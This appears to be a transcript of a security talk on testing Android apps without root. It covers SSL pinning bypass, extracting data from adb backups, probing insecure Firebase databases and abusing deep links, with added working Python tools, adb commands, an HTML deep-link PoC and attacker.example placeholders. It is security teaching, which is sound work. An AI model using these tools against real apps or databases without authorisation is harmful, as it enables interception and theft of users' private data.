Kunwar Atul presented techniques for pentesting Android applications without root access. This included bypassing SSL pinning by modifying the app's manifest to allow user certificates, extracting sensitive data from backup files without root using ADB, and exploiting insecure Firebase databases and deep links. Deep links could be triggered via ADB to load attacker URLs within an app's webview. References were provided on SSL pinning bypass with Burp Suite, Frida, and modifying apps; reading data without root; and exploiting Firebase and deep links. The presentation did not cover Android architecture, tools like Drozer and Apktool, or lab setups.
2. root@whoami
• Kunwar Atul
• Yet another Appsec and DevSecOps Guy
• Break – Fix – Repeat
• Part time Bug Hunter
• Synack Red Team Member
• OWASP MASVS Hindi Contributor (Ongoing Project)
• DevSecOps University Contributor
• I Love Knowing What’s Going On (emerging vulns, tools, PoC), CTFs, Offensive Security Work, Cricket, and no compromise with food and coffee.
• Social media- kunwaratulhax0r
3. Agenda
• What We Will Be Not Talking About
• SSL Pinning Bypass
• Reading Sensitive Data Without Rooted Device
• Exploiting Insecure Firebase Database
• Deep Links
• References
• Q/A
4. What We Will Be Not Talking About
• Android Architecture
• How to Use Drozer, ApkTool, JD-GUI, Dex2jar.
• Lab Setup
• Burp Configuration etc.
Because??
6. SSL Pinning Bypass
• Use Xposed + SSLUnpinning for bypassing the certificate, but if the super tricky
SSL Pinning is implemented then you can simply decompile the apk via apktool
and change protocol from https to http, compile back and sign, create a rule in
Charles that replaces the protocol from https to http.
Source: https://www.hackerone.com/blog/AndroidHackingMonth-qa-with-bagipro
7. SSL Pinning Bypass
You can install Burp as a System Level Trusted Certificate
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
8. SSL Pinning Bypass
• Android wants the certificate to be in PEM format, and to have the filename
equal to the subject_hash_old value appended with .0
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
9. SSL Pinning Bypass
• Copy the certificate to the device. We can use adb to copy the certificate over, but since it has to end up on the /system filesystem, we have to remount it as writable. As root, this is easy with adb remount (adb root only works on userdebug/eng builds, rooted devices or the emulator; on emulator images start the emulator with -writable-system, otherwise the remount fails):
• adb root
• adb remount
• adb push 9a5ba575.0 /sdcard/
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
10. SSL Pinning Bypass
• Then drop into a shell (adb shell) and move the file to /system/etc/security/cacerts and chmod it to 644. The file name (9a5ba575.0 here) is not fixed: it is the subject_hash_old of the CA you exported, computed on the previous slide.
• mv /sdcard/9a5ba575.0 /system/etc/security/cacerts/
• chmod 644 /system/etc/security/cacerts/9a5ba575.0
• Lastly, fully reboot the device with either adb reboot or a power cycle.
• After the device reboots, browsing to Settings -> Security -> Trusted Credentials should show the new “Portswigger CA” as a system trusted CA.
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
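The subject_hash_old file name is the step people most often get wrong, so here is an added example (not code from the slides or from the ropnop post) that derives it without the openssl CLI: it walks the certificate's DER structure to the subject Name and reimplements OpenSSL's X509_NAME_hash_old (MD5 of the subject's DER, first four bytes read little-endian). It accepts Burp's cacert.der or a PEM file; the certificate produced by build_sample_cert() is a constructed skeleton with subject CN=Example Test CA, not a real CA, and exists only so the script runs offline.

```python
"""Derive the Android system-CA file name (<subject_hash_old>.0) for a CA cert."""
import base64
import hashlib
import re


def der(tag, body):
    """Encode one DER TLV with a definite length."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def read_tlv(buf, pos):
    """Decode the TLV starting at buf[pos]; return (tag, value, end_offset)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def load_cert_der(data):
    """Accept DER (Burp's cacert.der) or PEM and return the DER bytes."""
    if data.lstrip().startswith(b"-----BEGIN"):
        return base64.b64decode(re.sub(rb"-----[^-]+-----|\s", b"", data))
    return data


def to_pem(cert_der):
    """Wrap DER as PEM, the encoding Android wants in cacerts/."""
    body = base64.encodebytes(cert_der).decode("ascii")
    return "-----BEGIN CERTIFICATE-----\n" + body + "-----END CERTIFICATE-----\n"


def subject_name_der(cert_der):
    """Return the DER-encoded subject Name, tag and length included.

    TBSCertificate ::= SEQUENCE { version [0] EXPLICIT OPTIONAL, serialNumber,
    signature, issuer, validity, subject, ... }: walk the fields up to subject.
    """
    _, cert, _ = read_tlv(cert_der, 0)          # Certificate
    _, tbs, _ = read_tlv(cert, 0)               # tbsCertificate
    tag, _, pos = read_tlv(tbs, 0)              # version [0] or serialNumber
    if tag == 0xA0:                             # version present: serial is next
        _, _, pos = read_tlv(tbs, pos)
    _, _, pos = read_tlv(tbs, pos)              # signature AlgorithmIdentifier
    _, _, pos = read_tlv(tbs, pos)              # issuer
    _, _, pos = read_tlv(tbs, pos)              # validity
    _, _, end = read_tlv(tbs, pos)              # subject
    return tbs[pos:end]


def subject_hash_old(cert_der):
    """OpenSSL's X509_NAME_hash_old: MD5 of the subject DER, first 4 bytes little-endian."""
    digest = hashlib.md5(subject_name_der(cert_der)).digest()
    return "%08x" % int.from_bytes(digest[:4], "little")


def android_ca_filename(cert_bytes):
    """File name Android expects under /system/etc/security/cacerts/."""
    return subject_hash_old(load_cert_der(cert_bytes)) + ".0"


def build_sample_cert():
    """Constructed, unsigned certificate skeleton (subject CN=Example Test CA); not a real CA."""
    cn = der(0x30, der(0x06, b"\x55\x04\x03") + der(0x0C, b"Example Test CA"))
    subject = der(0x30, der(0x31, cn))
    sha256_rsa = der(0x30, der(0x06, b"\x2A\x86\x48\x86\xF7\x0D\x01\x01\x0B") + der(0x05, b""))
    validity = der(0x30, der(0x17, b"240101000000Z") + der(0x17, b"340101000000Z"))
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01")
              + sha256_rsa + subject + validity + subject + der(0x30, b""))
    return der(0x30, tbs + sha256_rsa + der(0x03, b"\x00")), subject


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                        # python ca_name.py cacert.der
        with open(sys.argv[1], "rb") as fh:
            cert = fh.read()
    else:
        cert, _ = build_sample_cert()
    print(android_ca_filename(cert))
```

Write the PEM to that file name and push it as on the previous slide; if openssl is available, `openssl x509 -inform DER -in cacert.der -subject_hash_old -noout` must print the same eight hex digits, which is a quick cross-check before touching /system.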
11. SSL Pinning Bypass
• Modifying and repackaging an app
• If you don’t have root or don’t want to modify the system trusted certificates, you can install
the Burp CA as a user cert and then modify the specific APK you want to MitM.
• Starting with Nougat (API 24), apps that target it ignore user-installed certificates by default. This is visible in the logcat output when launching the app: the TLS handshake fails with a “Trust anchor for certification path not found” CertPathValidatorException.
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
12. SSL Pinning Bypass
• Without a network security config, the app will only trust system CAs and will not
honor the user installed Burp certificate.
• Getting around this involves:
• Disassembling the APK
• Adding a new XML resource to define a network security profile
• Modifying AndroidManifest.xml
• Repackaging and self-signing the APK
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
13. SSL Pinning Bypass
• Next, add a new network security config by creating the file network_security_config.xml
in the res/xml directory:
<network-security-config>
    <base-config>
        <trust-anchors>
            <!-- Trust preinstalled CAs -->
            <certificates src="system" />
            <!-- Additionally trust user added CAs -->
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
14. SSL Pinning Bypass
• Define the network security config in the AndroidManifest.xml file: in the <application> tag add the android:networkSecurityConfig attribute.
<application android:allowBackup="true" android:networkSecurityConfig="@xml/network_security_config"
...etc...>
• If the app already declares its own networkSecurityConfig, read that file before replacing it: it may contain <pin-set> entries, which your replacement drops. Pinning implemented in code (for example OkHttp's CertificatePinner) is not affected by the manifest change at all and needs the Frida approach on the next slide.
• Reassemble and sign the apk. For a self-signed key we can use keytool to create a new keystore and key, then sign the new apk with jarsigner. jarsigner only produces a v1 (JAR) signature; apps targeting Android 11 (API 30) or later must carry a v2 or newer signature, so for those use apksigner from the build-tools with the same keystore.
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
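The two XML edits in this procedure are mechanical, so here is an added example (not code from the slides or from the ropnop post) that applies them to a directory produced by apktool d: it writes res/xml/network_security_config.xml, sets android:networkSecurityConfig on <application>, and reports whether the app already had a config of its own so you can inspect it before it is discarded. The decoded directory, and the apktool b and apksigner steps afterwards, are assumed to be handled outside the script; make_sample_apk_dir() fabricates a minimal manifest for offline use and is not a real app.

```python
"""Patch a decoded (apktool d) APK directory so the app trusts user-added CAs."""
import os
import tempfile
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ET.register_namespace("android", ANDROID_NS)       # keep the android: prefix on write
NSC_ATTR = "{%s}networkSecurityConfig" % ANDROID_NS
CONFIG_NAME = "network_security_config"

NETWORK_SECURITY_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config>
        <trust-anchors>
            <!-- Trust preinstalled CAs -->
            <certificates src="system" />
            <!-- Additionally trust user added CAs (the Burp CA) -->
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>
"""


def write_network_security_config(apk_dir):
    """Create res/xml/network_security_config.xml; returns its path."""
    xml_dir = os.path.join(apk_dir, "res", "xml")
    os.makedirs(xml_dir, exist_ok=True)
    path = os.path.join(xml_dir, CONFIG_NAME + ".xml")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(NETWORK_SECURITY_CONFIG)
    return path


def patch_manifest(apk_dir):
    """Point <application> at @xml/network_security_config.

    Returns the attribute's previous value (None if absent). A non-None value
    means the app shipped its own config, possibly with <pin-set> entries:
    read res/xml/<that name>.xml before discarding it.
    """
    path = os.path.join(apk_dir, "AndroidManifest.xml")
    tree = ET.parse(path)
    app = tree.getroot().find("application")
    if app is None:
        raise ValueError("no <application> element in " + path)
    previous = app.get(NSC_ATTR)
    app.set(NSC_ATTR, "@xml/" + CONFIG_NAME)
    tree.write(path, encoding="utf-8", xml_declaration=True)
    return previous


def current_config(apk_dir):
    """Read the attribute back, to verify the patch took."""
    root = ET.parse(os.path.join(apk_dir, "AndroidManifest.xml")).getroot()
    app = root.find("application")
    return None if app is None else app.get(NSC_ATTR)


def make_sample_apk_dir(base=None):
    """Constructed minimal decoded-APK layout for offline use (not a real app)."""
    base = base or tempfile.mkdtemp(prefix="decoded_apk_")
    manifest = ('<?xml version="1.0" encoding="utf-8"?>\n'
                '<manifest xmlns:android="%s" package="com.example.target">\n'
                '  <application android:allowBackup="true" android:label="Target">\n'
                '    <activity android:name=".MainActivity"/>\n'
                '  </application>\n'
                '</manifest>\n') % ANDROID_NS
    with open(os.path.join(base, "AndroidManifest.xml"), "w", encoding="utf-8") as fh:
        fh.write(manifest)
    return base


if __name__ == "__main__":
    import sys                                      # python nsc_patch.py <decoded apk dir>
    apk_dir = sys.argv[1] if len(sys.argv) > 1 else make_sample_apk_dir()
    print("config written to", write_network_security_config(apk_dir))
    print("previous networkSecurityConfig:", patch_manifest(apk_dir))
    print("now:", current_config(apk_dir))
```

ElementTree rewrites the manifest from its parse tree, so comments are lost and attribute order may change; apktool does not care, but diff the result against the original if you want to be sure nothing else moved.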
15. SSL Pinning Bypass
• Apart from this, we can use Frida as well for bypassing the SSL Pinning. You can follow
below blog for more understanding about Frida.
https://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-
e9e1d733d29
17. Reading Sensitive Data Without Root
• The application stores data in /data/data/app.packagename/shared_prefs/SensitiveData.xml
• On a rooted device you can read it directly:
• adb shell cat /data/data/app.packagename/shared_prefs/SensitiveData.xml
And the output will look like this:
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="email">test@test.com</string>
<string name="name">Kunwar atul</string>
<string name="username">kunwaratulhax0r</string>
<string name="phoneNumber">9876543210</string>
</map>
18. Reading Sensitive Data Without Root
• But what if the device is not rooted?
• We already know that the application stores its data in the /data/data/app.packagename/shared_prefs/ folder. To reach it without root we can use Android's allowBackup feature, which lets us take a backup of a single application over ADB. The app has to allow it: android:allowBackup is true unless the manifest sets it to false, and on Android 12+ app data is left out of adb backup for apps targeting API 31 or higher unless the app is also debuggable.
• Run the following command. The device will prompt you to confirm the backup; if it asks for a password, set one (you will need it again to unpack) or leave it blank. Add -noapk if you only want the data and not the APK itself.
• adb backup -f backup.ab app.packagename
19. Reading Sensitive Data Without Root
• Once we have backup.ab, we use the open source tool android-backup-extractor (abe) to extract the data from the backup file.
• With the help of this tool (its unpack command) we turn the backup file into a tar archive, supplying the backup password if one was set.
• Extract it with tar xvf backup.tar and the sensitive file that lived in /data/data is readable under apps/app.packagename/sp/SensitiveData.xml.
Here you can read all the data the app let into the backup: shared preferences (sp/), SQLite databases (db/), images and other files (f/), the app's configuration files, security tokens, etc.
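For an unencrypted backup the conversion abe performs (java -jar abe.jar unpack backup.ab backup.tar [password]) is small enough to do by hand, and seeing it makes the file format clear. The following is an added example, not the slides' tooling or abe's code: it checks the four-line .ab header (magic, format version, compression flag, encryption scheme), zlib-inflates the payload into a tar archive and pulls out one package's files, which adb backup stores under apps/<package>/ with shared_prefs in sp/, databases in db/ and files in f/. Encrypted backups are refused and left to abe. The backup built by build_sample_backup() is constructed here for offline use; the package name and preferences are invented.

```python
"""Unpack an unencrypted adb backup (.ab) and list one app's private files."""
import io
import sys
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP\n"


def parse_ab_header(data):
    """Header: magic line, format version, '1' if zlib-compressed, encryption ('none' or AES-256)."""
    if not data.startswith(MAGIC):
        raise ValueError("not an adb backup file (bad magic)")
    pos = len(MAGIC)
    fields = []
    for _ in range(3):
        nl = data.index(b"\n", pos)
        fields.append(data[pos:nl].decode("ascii"))
        pos = nl + 1
    return {"version": int(fields[0]), "compressed": fields[1] == "1",
            "encryption": fields[2], "payload_offset": pos}


def ab_to_tar(data):
    """Return the tar archive bytes contained in an unencrypted .ab."""
    hdr = parse_ab_header(data)
    if hdr["encryption"] != "none":
        raise ValueError("encrypted backup (%s): unpack with abe and the password" % hdr["encryption"])
    payload = data[hdr["payload_offset"]:]
    return zlib.decompress(payload) if hdr["compressed"] else payload


def app_files(tar_bytes, package):
    """Map path -> bytes for one package, relative to apps/<package>/ in the archive."""
    prefix = "apps/%s/" % package
    out = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
        for member in tf.getmembers():
            if member.isfile() and member.name.startswith(prefix):
                out[member.name[len(prefix):]] = tf.extractfile(member).read()
    return out


def build_sample_backup(package, files, version=5):
    """Constructed compressed, unencrypted .ab with the given files, for offline testing."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo("apps/%s/%s" % (package, name))
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return MAGIC + ("%d\n1\nnone\n" % version).encode("ascii") + zlib.compress(buf.getvalue())


# Constructed shared_prefs content, shaped like the slide's SensitiveData.xml.
SAMPLE_PREFS = (b"<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n"
                b'<string name="email">test@test.com</string>\n</map>\n')

if __name__ == "__main__":
    if len(sys.argv) == 3:                       # python ab_unpack.py backup.ab app.packagename
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
        package = sys.argv[2]
    else:                                        # no arguments: use the constructed sample
        package = "app.packagename"
        data = build_sample_backup(package, {"sp/SensitiveData.xml": SAMPLE_PREFS})
    for path, content in app_files(ab_to_tar(data), package).items():
        print("==", path)
        print(content.decode("utf-8", "replace"))
```

A version-5 header with encryption "none" is exactly 24 bytes, which is why the common one-liners skip 24 bytes before inflating; checking the fields instead of hard-coding the offset also catches encrypted backups before zlib chokes on them.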
20. Reading Sensitive Data Without Root
• We can also reach the sensitive data through the debuggable method.
• Check the AndroidManifest.xml file for android:debuggable="true" on the <application> tag.
• To see which applications are connected to the debugging socket (@jdwp-control), run adb jdwp; it lists the PIDs (process identifiers) of the apps that can be debugged.
• Then check which PID belongs to the target application:
• adb shell ps | grep com.apptest.data
• Now type adb shell; with the help of the run-as binary we can execute commands as the com.apptest.data application (run-as works only for debuggable packages and needs no root). From there you can read the app's private files or run arbitrary code with the application's permissions.
https://manifestsecurity.com/android-application-security-part-21/
21. Exploiting Insecure Firebase Database
• Decompile the apk and go to Resources > resources.arsc > res > values > strings.xml
• Search for *.firebaseio.com in the xml file (newer Realtime Database instances may instead use a <name>.<region>.firebasedatabase.app host), then open https://*.firebaseio.com/.json in the browser; you might find read access to the database.
• If the URL returns null (an empty database) or a JSON document, read permission is open; a locked database answers with HTTP 401 and {"error": "Permission denied"}. When read is open, also test for write permission, which this script automates: https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit
https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/
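The read/write check is worth automating per target, so here is an added example (not the slides' code and not the Insecure-Firebase-Exploit script) that pulls the database URLs out of a decoded strings.xml, classifies the /.json response, and optionally probes write access with a uniquely named key that it deletes again. The HTTP layer is an injectable fetch callable so the logic runs offline; the default uses urllib. The strings.xml and the fake Firebase responses are constructed for the example and the target-app-12345 host is invented. Only run the write probe against databases you are authorised to test.

```python
"""Find Firebase Realtime Database URLs in strings.xml and test their REST rules."""
import json
import re
import urllib.error
import urllib.request
import uuid

# Classic *.firebaseio.com hosts plus the newer regional *.firebasedatabase.app ones.
FIREBASE_RE = re.compile(r"https://[\w.-]+\.(?:firebaseio\.com|firebasedatabase\.app)")


def find_firebase_urls(strings_xml):
    return sorted(set(FIREBASE_RE.findall(strings_xml)))


def default_fetch(url, method="GET", body=None):
    """Return (status, body_text); HTTP error statuses are returned, not raised."""
    req = urllib.request.Request(url, data=body, method=method,
                                 headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify(status, body):
    """'open' when the rules allowed the request, 'locked' on Permission denied."""
    try:
        doc = json.loads(body)
    except ValueError:
        return "unexpected"
    if status == 200:
        return "open"                # null (empty tree) or real data: the rule is true
    if status == 401 and isinstance(doc, dict) and doc.get("error") == "Permission denied":
        return "locked"
    return "unexpected"


def check_database(base_url, fetch=default_fetch, probe_write=False):
    base_url = base_url.rstrip("/")
    # shallow=true returns only top-level keys, so a huge database does not flood us
    result = {"read": classify(*fetch(base_url + "/.json?shallow=true"))}
    if probe_write:
        key = "pentest-" + uuid.uuid4().hex      # unique, cannot collide with app data
        probe_url = "%s/%s.json" % (base_url, key)
        payload = json.dumps({"note": "authorised security test, safe to delete"}).encode()
        status, body = fetch(probe_url, "PUT", payload)
        result["write"] = classify(status, body)
        if status == 200:
            fetch(probe_url, "DELETE")           # clean up what we wrote
    return result


# Constructed strings.xml fragment; the host is invented.
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Target</string>
    <string name="firebase_database_url">https://target-app-12345.firebaseio.com</string>
</resources>
"""


def make_fake_fetch(read_open, write_open, log):
    """Constructed stand-in for the network: records calls and answers like Firebase."""
    denied = (401, '{"error" : "Permission denied"}')

    def fetch(url, method="GET", body=None):
        log.append((method, url))
        if method == "GET":
            return (200, "null") if read_open else denied
        if method == "PUT":
            return (200, body.decode()) if write_open else denied
        return (200, "null")                     # DELETE of our probe key
    return fetch


if __name__ == "__main__":
    for url in find_firebase_urls(SAMPLE_STRINGS_XML):
        fake = make_fake_fetch(read_open=True, write_open=False, log=[])
        print(url, check_database(url, fetch=fake, probe_write=True))
```

Pass fetch=default_fetch (the default) to run it for real; a database can be readable but not writable or the reverse, which is why the write probe runs regardless of the read result.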
22. Deep Links
• Deep linking is a method for launching a native mobile app via a link.
• It connects a unique URL to a defined action in the mobile app, linking straight to the relevant content.
• When the app takes a parameter from the link and loads it in a WebView without validating it, the deep link lets an attacker load any URL they control inside the app.
• Example:
• <data android:host="user" android:pathPrefix="/" android:scheme="abcd"/>
• <data android:host="user" android:pathPrefix="/" android:scheme="abcde"/>
This means we can use abcd://user/user-id or abcde://user/user-id
23. Deep Links
• Here is an HTML PoC that triggers the deep link from a web page:
<!DOCTYPE html>
<html>
<a href="abcd://user/<any user-id>/follow">Demo Page</a>
</html>
24. Deep Links
• Exploiting deep links via ADB. Let's analyse the AndroidManifest.xml code below: the filter is VIEW + BROWSABLE, so a browser or any other app can open it, and it accepts content:// and file:// URIs of MIME type text/plain from any host.
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="content" />
<data android:scheme="file" />
<data android:mimeType="text/plain" />
<data android:host="*" />
</intent-filter>
• Launch the activity with a matching URI from ADB (-W waits for the launch to complete; the last argument is the target package):
adb shell am start -W -a android.intent.action.VIEW -d "example://gizmos" com.companyname
Replace the URI with one the filter accepts, e.g. abcd://user/<user-id> for the scheme shown on the previous slides.
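Reading the filters by hand works for one activity but not for a large app, so here is an added example (not code from the slides) that does what the two manifest slides describe for a whole decoded AndroidManifest.xml: it keeps only intent-filters declaring VIEW plus BROWSABLE (the ones a link or another app can reach), merges their <data> elements the way Android does (every scheme combines with every host and path), and prints an `adb shell am start` line per candidate URI. Wildcard hosts are filled with the placeholder attacker.example, which the tester substitutes. The sample manifest is constructed and its activities are not from any real app; it carries the slides' abcd/abcde filter and the content/file filter above, plus a non-browsable one that must be skipped.

```python
"""Enumerate browser-reachable deep links from AndroidManifest.xml and build adb commands."""
import shlex
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"
VIEW = "android.intent.action.VIEW"
BROWSABLE = "android.intent.category.BROWSABLE"


def browsable_view_filters(manifest_xml):
    """Return [(activity name, [data attribute dicts])] for filters a link can trigger."""
    root = ET.fromstring(manifest_xml)
    found = []
    for activity in root.iter("activity"):
        for filt in activity.findall("intent-filter"):
            actions = {a.get(A + "name") for a in filt.findall("action")}
            categories = {c.get(A + "name") for c in filt.findall("category")}
            if VIEW in actions and BROWSABLE in categories:
                datas = [{k.replace(A, ""): v for k, v in d.attrib.items()}
                         for d in filt.findall("data")]
                found.append((activity.get(A + "name"), datas))
    return found


def _unique(values):
    return list(dict.fromkeys(values))           # dedupe, keep manifest order


def candidate_uris(datas):
    """Android merges all <data> of one filter into one scheme/host/path set."""
    schemes = _unique(d["scheme"] for d in datas if "scheme" in d)
    hosts = _unique(d["host"] for d in datas if "host" in d) or [""]
    paths = _unique(d[k] for d in datas for k in ("path", "pathPrefix", "pathPattern") if k in d) or ["/"]
    uris = []
    for scheme in schemes:
        for host in hosts:
            # wildcard hosts: substitute a placeholder the tester replaces
            host = "attacker.example" if host == "*" else host.replace("*.", "sub.", 1)
            for path in paths:
                uris.append("%s://%s%s" % (scheme, host, path))
    return uris


def adb_start_command(package, uri):
    """-W waits for the launch; the trailing package restricts resolution to the app."""
    return "adb shell am start -W -a %s -d %s %s" % (VIEW, shlex.quote(uri), package)


def enumerate_deep_links(manifest_xml):
    """Return [(activity, uri, adb command)] for every candidate deep link."""
    package = ET.fromstring(manifest_xml).get("package")
    rows = []
    for activity, datas in browsable_view_filters(manifest_xml):
        for uri in candidate_uris(datas):
            rows.append((activity, uri, adb_start_command(package, uri)))
    return rows


# Constructed manifest: the slides' two filters plus a non-browsable one to ignore.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.target">
  <application>
    <activity android:name=".UserActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:host="user" android:pathPrefix="/" android:scheme="abcd"/>
        <data android:host="user" android:pathPrefix="/" android:scheme="abcde"/>
      </intent-filter>
    </activity>
    <activity android:name=".ViewerActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="content"/>
        <data android:scheme="file"/>
        <data android:mimeType="text/plain"/>
        <data android:host="*"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <data android:scheme="internal"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

if __name__ == "__main__":
    import sys                                   # python deeplinks.py AndroidManifest.xml
    xml_text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    for activity, uri, cmd in enumerate_deep_links(xml_text):
        print("%-18s %-32s %s" % (activity, uri, cmd))
```

Each printed URI is only the entry point; the interesting part is what the activity does with the path and query parameters once it is started, which is where a parameter ending up in WebView.loadUrl turns a deep link into the attacker-controlled page load described above.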